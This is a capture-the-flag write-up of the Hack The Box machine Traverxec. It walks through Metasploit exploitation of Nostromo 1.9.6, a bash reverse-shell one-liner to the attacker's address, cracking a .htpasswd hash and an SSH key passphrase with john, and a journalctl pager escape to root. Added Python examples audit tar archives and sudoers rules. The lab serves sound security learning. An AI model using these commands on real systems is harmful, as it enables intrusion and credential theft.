
HTB: Traverxec

Rubytox, 27th December 2019

Hello everyone!

Today I’m going to write up the Hack The Box machine Traverxec, made by jkr. The box is rated easy by its maker and it is indeed fairly easy; I think it’s a good box for a beginner because you can learn a lot of new concepts that involve reading and understanding documentation: I spent a lot of time skimming it and missed some interesting points because of that.

As on every box, I’ll add the box’s IP as traverxec.ctf in /etc/hosts. Now let’s start!

As usual, we start with an nmap scan which gives us the following result:

$ nmap -sV -sT -sC traverxec.ctf

Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-29 16:11 CET
Nmap scan report for traverxec.ctf (10.10.10.165)
Host is up (0.16s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (EdDSA)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.80 seconds

I’m not sure there are many exploits for SSH, so exploring port 80 seems the better idea. The web server listening on port 80 is Nostromo, which I didn’t know about. According to Wikipedia [1], this web server is run by the daemon nhttpd.

As searchsploit shows, there is essentially one known exploit for Nostromo (a directory traversal leading to remote command execution), listed once as a Metasploit module and once as a shell script:

$ searchsploit nostromo
--------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                               |  Path
                                                                                             | (/opt/exploitdb/)
--------------------------------------------------------------------------------------------- ----------------------------------
Nostromo - Directory Traversal Remote Command Execution (Metasploit)                         | exploits/multiple/remote/47573.rb
nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution                         | exploits/linux/remote/35466.sh
--------------------------------------------------------------------------------------------- ----------------------------------
Shellcodes: No Result

Let’s check with Metasploit whether this vulnerability can be exploited on our target.

msf5 > use exploit/multi/http/nostromo_code_exec
msf5 exploit(multi/http/nostromo_code_exec) > show options

Module options (exploit/multi/http/nostromo_code_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)


msf5 exploit(multi/http/nostromo_code_exec) > set RHOSTS traverxec.ctf
RHOSTS => traverxec.ctf
msf5 exploit(multi/http/nostromo_code_exec) > set LHOST tun0
LHOST => 10.10.16.46
msf5 exploit(multi/http/nostromo_code_exec) > check
[*] 10.10.10.165:80 - The target appears to be vulnerable.

Great! This means that we can probably get a reverse shell easily. To make the rest of the exploitation more comfortable, we’re going to open a plain TCP reverse shell once Metasploit’s session is up.

First we listen on port 1337 with nc -vlp 1337, then we exploit with Metasploit:

msf5 exploit(multi/http/nostromo_code_exec) > exploit

[*] Started reverse TCP handler on 10.10.16.46:4444
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (10.10.16.46:4444 -> 10.10.10.165:41902) at 2019-12-27 18:56:34 +0100

bash -c "exec bash -i >& /dev/tcp/10.10.16.46/1337 0>&1"

The last line is the command we type into the Metasploit session to spawn a TCP connection back to our machine, which is listening on port 1337. We now have a friendlier reverse shell:

www-data@traverxec:/usr/bin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

However, this shell is low-privileged, so we need to explore a bit in order to get the user and root flags. Looking into the /home directory, we find a user named david:

www-data@traverxec:/home$ ls -la
drwx--x--x  7 david david 4096 Dec 27 12:57 david

Interestingly, David’s home directory can be entered (the execute bit is set for everyone) but not listed or modified. As we don’t really know what we’re looking for at the moment, I’ll get back to this directory a bit later. When dealing with a web server, we can usually find the files it uses under /var. Here, the interesting files are in /var/nostromo:

www-data@traverxec:/var/nostromo$ ls -la
drwxr-xr-x  2 root     daemon 4096 Oct 27 16:12 conf
drwxr-xr-x  6 root     daemon 4096 Oct 25 17:11 htdocs
drwxr-xr-x  2 root     daemon 4096 Oct 25 14:43 icons
drwxr-xr-x  2 www-data daemon 4096 Dec 27 13:00 logs

Here, the interesting directory is conf: htdocs basically contains the files and media used by the website, which aren’t really interesting, and the other directories don’t contain anything exploitable. So let’s go to the conf directory, which should contain Nostromo’s configuration.

www-data@traverxec:/var/nostromo/conf$ ls -la
-rw-r--r-- 1 root bin      41 Oct 25 15:20 .htpasswd
-rw-r--r-- 1 root bin    2928 Oct 25 14:26 mimes
-rw-r--r-- 1 root bin     498 Oct 25 15:20 nhttpd.conf

We first notice that there’s a .htpasswd file there, which contains the hashed password for user david:

david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

We’re going to crack this hash using john with the rockyou wordlist, which gives us:

david:Nowonly4me

Now we just need to find where these credentials can be used: the initial website doesn’t ask for authentication. Let’s look at the configuration file we found in the same directory.

We remember from the Wikipedia article that nhttpd is the name of Nostromo’s web server daemon, so the file nhttpd.conf will contain the configuration, which is:

www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf
# MAIN [MANDATORY]

servername              traverxec.htb
serverlisten            *
serveradmin             david@traverxec.htb
serverroot              /var/nostromo
servermimes             conf/mimes
docroot                 /var/nostromo/htdocs
docindex                index.html

# LOGS [OPTIONAL]

logpid                  logs/nhttpd.pid

# SETUID [RECOMMENDED]

user                    www-data

# BASIC AUTHENTICATION [OPTIONAL]

htaccess                .htaccess
htpasswd                /var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]

/icons                  /var/nostromo/icons

# HOMEDIRS [OPTIONAL]

homedirs                /home
homedirs_public         public_www

Let’s explain why the last two lines of this file matter. The Nostromo documentation [2] tells us that any user can host their personal files: the homedirs entry specifies the directory containing the home directories of the users allowed to host pages. Here, we see that any user located in /home can host pages; in particular, David can. We also learn that a user’s hosted pages are reachable at the URL http://traverxec.ctf/~user/. We’re going to try with David:

[Screenshot: David's home page]

At this point I was a bit stuck, because it seemed to be a completely static website. My mistake was assuming that the page shown in the screenshot was served from the root of David’s home directory: when I tried common paths such as .ssh, or the user.txt file which should contain the flag, I got a 404 error. That actually meant I was looking in the wrong directory.

I read the documentation again and came upon a line I didn’t notice before:

You can restrict the access within the home directories to a single sub directory by defining it via the homedirs_public option.

This is why the last line of the configuration file matters: the homedirs_public entry names the subdirectory, inside each user’s home directory, from which hosted files are served. As David’s home directory can be entered, we can try to find his public_www directory:
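To make the homedirs and homedirs_public mechanism concrete, here is a small resolver written for this writeup (it is not Nostromo's own code). It parses the key/value layout of nhttpd.conf as shown above and maps a request path such as /~david/index.html to the filesystem location the server would serve it from. The refusal rules (a /~user/ request must stay inside that user's public_www tree) are this example's own assumed policy, not something taken from Nostromo's source, and the configuration sample is a constructed trim of the one above.

```python
"""Illustrative resolver for Nostromo-style "homedirs" URLs (added example)."""
import posixpath

# Constructed sample, trimmed from the nhttpd.conf shown in the writeup.
SAMPLE_CONF = """\
# MAIN [MANDATORY]
servername              traverxec.htb
docroot                 /var/nostromo/htdocs
docindex                index.html

# ALIASES [OPTIONAL]
/icons                  /var/nostromo/icons

# HOMEDIRS [OPTIONAL]
homedirs                /home
homedirs_public         public_www
"""


def parse_conf(text):
    """Turn 'key value' lines into a dict; '/path value' lines become aliases."""
    conf = {"aliases": {}}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        key, value = parts
        if key.startswith("/"):
            conf["aliases"][key] = value.strip()
        else:
            conf[key] = value.strip()
    return conf


def resolve(conf, url_path):
    """Map a request path to a filesystem path; None means the request is refused."""
    wants_index = url_path.endswith("/")
    is_home = url_path.lstrip("/").startswith("~")
    clean = posixpath.normpath(url_path if url_path.startswith("/") else "/" + url_path)

    if is_home:
        # Assumed policy: after '..' collapsing the path must still sit under
        # some /~user/, otherwise it tried to climb out of the user's tree.
        if not clean.startswith("/~"):
            return None
        user, _, rest = clean[2:].partition("/")
        if not user or user in (".", "..") or "homedirs" not in conf:
            return None
        base = posixpath.join(conf["homedirs"], user)
        # homedirs_public restricts serving to this subdirectory of the home.
        if conf.get("homedirs_public"):
            base = posixpath.join(base, conf["homedirs_public"])
    else:
        base, rest = conf["docroot"], clean.lstrip("/")
        for prefix, directory in conf["aliases"].items():
            if clean == prefix or clean.startswith(prefix + "/"):
                base, rest = directory, clean[len(prefix):].lstrip("/")
                break

    if rest == "" or wants_index:
        rest = posixpath.join(rest, conf.get("docindex", "index.html"))
    target = posixpath.normpath(posixpath.join(base, rest))
    # Belt and braces: never hand back anything outside the chosen base.
    if target != base and not target.startswith(base.rstrip("/") + "/"):
        return None
    return target


if __name__ == "__main__":
    cfg = parse_conf(SAMPLE_CONF)
    for url in ("/", "/~david/", "/~david/protected-file-area/", "/~david/../.ssh/id_rsa"):
        print(f"{url:40} -> {resolve(cfg, url)}")
```

Note what the mapping implies for enumeration: with homedirs_public set, http://traverxec.ctf/~david/ is backed by /home/david/public_www/, not by /home/david/, which is exactly why the .ssh and user.txt guesses above returned 404.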

www-data@traverxec:/home/david/public_www$ ls -la
-rw-r--r-- 1 david david  402 Oct 25 15:45 index.html
drwxr-xr-x 2 david david 4096 Dec 27 13:22 protected-file-area

We then go into the protected-file-area directory:

www-data@traverxec:/home/david/public_www/protected-file-area$ ls -la
-rw-r--r-- 1 david david    45 Oct 25 15:46 .htaccess
-rw-r--r-- 1 david david 10240 Oct 25 17:02 backup-ssh-identity-files.tar

We see an interesting tar archive, which is likely to contain David’s SSH keys. There are several ways to get the file: we can browse to the protected-file-area directory and download it; however, there is a .htaccess file, which restricts access to that directory. This is where the .htpasswd credentials come in handy!

There is another way, which works for small files, that I learned about recently: base64-encode the file in the shell we already have, copy the output to our machine, and decode it with base64 -d.

Either way, we now have a tar archive. Security note: before extracting a tar archive, we should always check its contents! The -t option of tar lists the members without extracting them (-v adds permissions, owner and size):

$ tar -tvf tarfile
drwx------ david/david       0 2019-10-25 23:02 home/david/.ssh/
-rw-r--r-- david/david     397 2019-10-25 23:02 home/david/.ssh/authorized_keys
-rw------- david/david    1766 2019-10-25 23:02 home/david/.ssh/id_rsa
-rw-r--r-- david/david     397 2019-10-25 23:02 home/david/.ssh/id_rsa.pub

This is useful to detect a tarbomb [3], for instance.
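A listing is only as good as the eye reading it, so here is an automated pre-extraction check, added for this writeup and not part of the original post. It builds an archive in memory whose members mirror the listing above (file contents are constructed placeholders, not the real keys), adds two hostile members that are easy to overlook in a long tar -tvf, and reports anything that should stop a blind tar -xf: absolute or '..' member names, links whose target leaves the extraction directory, device/FIFO members, and a tarbomb layout (many members with no common top-level directory).

```python
"""Pre-extraction audit of a tar archive, complementing `tar -tvf` (added example)."""
import io
import posixpath
import tarfile


def _add(tar, name, data=b"", mode=0o644, ftype=tarfile.REGTYPE, linkname=""):
    """Append one member to an archive being written."""
    info = tarfile.TarInfo(name)
    info.type = ftype
    info.mode = mode
    info.linkname = linkname
    info.size = len(data) if ftype == tarfile.REGTYPE else 0
    tar.addfile(info, io.BytesIO(data) if ftype == tarfile.REGTYPE else None)


def make_sample_archive(extra_top_level=0):
    """Constructed archive resembling backup-ssh-identity-files.tar, plus bad members."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        _add(tar, "home/david/.ssh/", mode=0o700, ftype=tarfile.DIRTYPE)
        _add(tar, "home/david/.ssh/authorized_keys", b"ssh-rsa AAAA...constructed\n")
        _add(tar, "home/david/.ssh/id_rsa", b"-----BEGIN RSA PRIVATE KEY-----\nconstructed\n", 0o600)
        _add(tar, "home/david/.ssh/id_rsa.pub", b"ssh-rsa AAAA...constructed\n")
        # Hostile members: one climbs out of the target directory, the other is
        # a symlink pointing outside it (a later member could then write through it).
        _add(tar, "../../.bashrc", b"# constructed\n")
        _add(tar, "home/david/.ssh/config", ftype=tarfile.SYMTYPE, linkname="/etc/passwd")
        # Optional tarbomb: unrelated files dumped straight into the cwd.
        for i in range(extra_top_level):
            _add(tar, f"file{i}.txt", b"constructed\n")
    return buf.getvalue()


def audit_tar(data, max_top_level=1):
    """Return (member, reason) pairs; an empty list means extraction looks safe."""
    findings = []
    top_level = set()
    with tarfile.open(fileobj=io.BytesIO(data), mode="r") as tar:
        for m in tar.getmembers():
            norm = posixpath.normpath(m.name)
            escapes = m.name.startswith("/") or norm == ".." or norm.startswith("../")
            if escapes:
                findings.append((m.name, "member path escapes the extraction directory"))
            if m.issym() or m.islnk():
                # Hard-link targets are archive-relative; symlink targets are
                # relative to the member's own directory.
                if m.islnk():
                    dest = posixpath.normpath(m.linkname)
                else:
                    dest = posixpath.normpath(posixpath.join(posixpath.dirname(norm), m.linkname))
                if m.linkname.startswith("/") or dest == ".." or dest.startswith("../"):
                    findings.append((m.name, f"link target {m.linkname!r} escapes the extraction directory"))
            if m.isdev() or m.isfifo():
                findings.append((m.name, "device or FIFO member"))
            if not escapes:
                top_level.add(norm.split("/", 1)[0])
    if len(top_level) > max_top_level:
        findings.append(("<archive>", f"tarbomb: {len(top_level)} top-level entries, expected at most {max_top_level}"))
    return findings


if __name__ == "__main__":
    for member, reason in audit_tar(make_sample_archive(extra_top_level=3)):
        print(f"{member}: {reason}")
```

On Python 3.12 and later (and the security backports to older 3.x releases), tarfile.extractall(path, filter="data") refuses the same classes of member at extraction time; the audit above is the equivalent check you can run before deciding to extract at all, which is what the tar -t step in the writeup is doing by hand.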

Now we can extract the archive and go to the .ssh directory. We come across the id_rsa and id_rsa.pub RSA identity files, which we’re going to use to connect to the machine via SSH:

$ ssh -i id_rsa david@traverxec.ctf
Enter passphrase for key 'id_rsa':

The private key id_rsa is protected by a passphrase, so we have to crack it. We use ssh2john to turn the key into a hash that john understands, then run john with the rockyou wordlist:

$ ssh2john id_rsa > hash
$ john --wordlist=rockyou.txt hash
id_rsa:hunter

Then, we can connect using SSH:

$ ssh -i id_rsa david@traverxec.ctf
Enter passphrase for key 'id_rsa': [hunter]
david@traverxec:~$ id
uid=1000(david) gid=1000(david) groups=1000(david),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
david@traverxec:~$ cat user.txt
7db0b[-- REDACTED --]82f3d

We owned user!

Let’s own root now. In David’s home directory, we see a bin directory containing two files: server-stats.head and server-stats.sh. The former is just a piece of ASCII art, the latter a script which shows some information about the nhttpd service:

#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

The most interesting line is the last one: it calls the journalctl utility using sudo; we might be able to execute something else through it.

First, we can try to change the executable called after sudo, but it doesn’t work. It’s likely that journalctl, with exactly these arguments, is the only program David may run with sudo without being asked for a password; this kind of behaviour is configured in /etc/sudoers. So we need to get root through journalctl itself. We can check whether there is any known way to do so on GTFOBins.

We learn [4] that when the text journalctl has to display is longer than the terminal, it spawns the default pager, which is usually less. If we manage to get less spawned, we can get a shell by typing ! bash. However, journalctl is asked to print only five lines, and we can’t change that: sudo refuses the command if we do.

So, how can we make journalctl think it has more text than fits on screen, without altering the quantity of text it prints? Change the terminal size! We resize our terminal to the following:

[Screenshot: Low resolution]

This is enough to be able to spawn less:

[Screenshot: Low resolution]

We just have to type ! /bin/bash:

[Screenshot: Low resolution]

We owned root!
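The root step works because a sudo rule hands David a command that can start an interactive pager, and the pipe through cat inside server-stats.sh offers no protection since the rule covers the journalctl invocation, not the script. Below is a small sudoers auditor written for this writeup (not part of the original post, and not a tool from the box) that flags NOPASSWD rules whose command is known to spawn a pager or shell. The sudoers sample is constructed: the box's real /etc/sudoers is never shown, only the fact that sudo /usr/bin/journalctl -n5 -unostromo.service runs without a password. The list of pager-spawning commands is a deliberately short subset; GTFOBins [4] keeps the full one.

```python
"""Flag sudoers rules that hand the caller a pager or shell (added example)."""
import re
import shlex

# Constructed subset of commands that page or drop to a shell when interactive.
PAGER_SPAWNERS = {
    "journalctl": "spawns $PAGER unless --no-pager is given or output is piped",
    "less": "'!' runs a shell",
    "more": "'!' runs a shell",
    "man": "hands output to a pager",
    "git": "uses a pager for log/diff",
    "systemctl": "uses a pager for status/list output",
}

# Constructed sample; the box's real /etc/sudoers is not shown in the writeup.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
david   ALL=(ALL) NOPASSWD: /usr/bin/journalctl -n5 -unostromo.service
backup  ALL=(ALL) NOPASSWD: /usr/bin/journalctl --no-pager -n5 -unostromo.service
alice   ALL=(ALL) NOPASSWD: /usr/bin/systemctl status nostromo.service
"""

# user  host=(runas) [TAG: ...] command[, command]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+\S+\s*=\s*(\([^)]*\)\s*)?(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$"
)


def parse_rules(text):
    """Parse user-specification lines into dicts; Defaults and comments are skipped."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip().upper() for t in m.group("tags").split(":") if t.strip()}
        for cmd in m.group("cmds").split(","):
            rules.append({"user": m.group("user"),
                          "nopasswd": "NOPASSWD" in tags,
                          "cmd": cmd.strip()})
    return rules


def audit(rules):
    """Return (user, command, reason) for every password-less rule worth a second look."""
    findings = []
    for r in rules:
        if not r["nopasswd"]:
            continue
        if r["cmd"] == "ALL":
            findings.append((r["user"], r["cmd"], "NOPASSWD for any command"))
            continue
        argv = shlex.split(r["cmd"])
        prog = argv[0].rsplit("/", 1)[-1]
        if prog not in PAGER_SPAWNERS:
            continue
        # A pinned --no-pager argument closes the journalctl case.
        if prog == "journalctl" and "--no-pager" in argv[1:]:
            continue
        findings.append((r["user"], r["cmd"], PAGER_SPAWNERS[prog]))
    return findings


if __name__ == "__main__":
    for user, cmd, reason in audit(parse_rules(SAMPLE_SUDOERS)):
        print(f"{user}: {cmd}\n    {reason}")
```

The backup user's rule shows the fix that would have closed this box's root step: pin --no-pager inside the sudoers command (sudo matches the whole argument list, so the user cannot drop it), or grant sudo on the wrapper script alone rather than on the command it wraps.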

Conclusion: I thought this box was pretty fun; it allowed me to learn a lot, especially about enumeration, and it took me a very long time to find the use of the homedirs_public entry. To me the user part was the hardest; root was straightforward.

I hope you liked my writeup and that it could have been useful to you!

So this is over for this box! If you have any comments or suggestions, feel free to open an issue on this website's GitHub page.


1. https://en.wikipedia.org/wiki/Nhttpd
2. https://www.gsp.com/cgi-bin/man.cgi?section=8&topic=nhttpd
3. http://www.linfo.org/tarbomb.html
4. https://gtfobins.github.io/gtfobins/journalctl/

Copyright © 2020-2021 Rubytox